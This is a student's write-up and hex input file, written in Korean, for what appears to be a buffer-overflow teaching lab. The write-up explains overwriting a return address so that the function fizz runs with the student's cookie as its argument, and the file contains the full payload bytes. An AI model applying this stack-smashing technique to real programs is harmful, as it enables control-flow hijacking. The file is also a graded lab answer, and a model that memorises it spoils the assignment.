/*

미션 1의 목표는 fizz() 함수가 호출되되, 함수에 파라미터도 같이 넘겨야 합니다.
mission0.txt 의 코드를 약간만 수정하면 될것같습니다.

objdump 로 fizz 함수의 코드를 봤더니 이런게 있었습니다.

    55                   push   ebp
    89 e5                mov    ebp,esp
    83 ec 18             sub    esp,0x18
    8b 45 08             mov    eax,DWORD PTR [ebp+0x8]
    3b 05 08 d1 04 08    cmp    eax,DWORD PTR ds:0x804d108
    75 26                jne    8048c79 <fizz+0x37>

아무래도 ebp + 0x8 위치에 파라미터가 저장되었다고 가정하고있는것이 거의
확실한것같습니다. 제 아이디(sp02)로 만들어지는 쿠키는 `0x70fe5747` 입니다.
fizz 함수의 위치는 `0x08048c42` 였습니다.

ebp + 0x8 위치에 파라미터가 저장되어있는데, ebp는 이전 실행했을때의 esp(탑
포인터) 값입니다. 이때 fizz 함수는 정상적으로 호출되는게 아니라, getbuf함수가
return 되면서 실행되므로, fizz가 호출될 당시의 상황은 getbuf의 스택프레임이 모두
정리된 상황이므로, ebp+0x8에서 ebp는 getbuf 스택프레임의 시작주소 (getbuf 함수가
실행되는동안 return address가 저장되어있었던 위치)이고, ebp+0x8은 mission0.txt
에서 덮어쓴 버퍼에서 8바이트 더 덮어쓰면 도달할 수 있는 위치인겁니다.

그래서 mission0.txt 에서 함수 위치만 바꿔주고, 4바이트는 아무거나로 채우고 다음
4바이트에 쿠키값을 리틀엔디언으로 넣으면 mission1이 해결됩니다

*/

00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00 /* saved ebp */
42 8c 04 08 /* return addr */
00 00 00 00
47 57 fe 70 /* param */
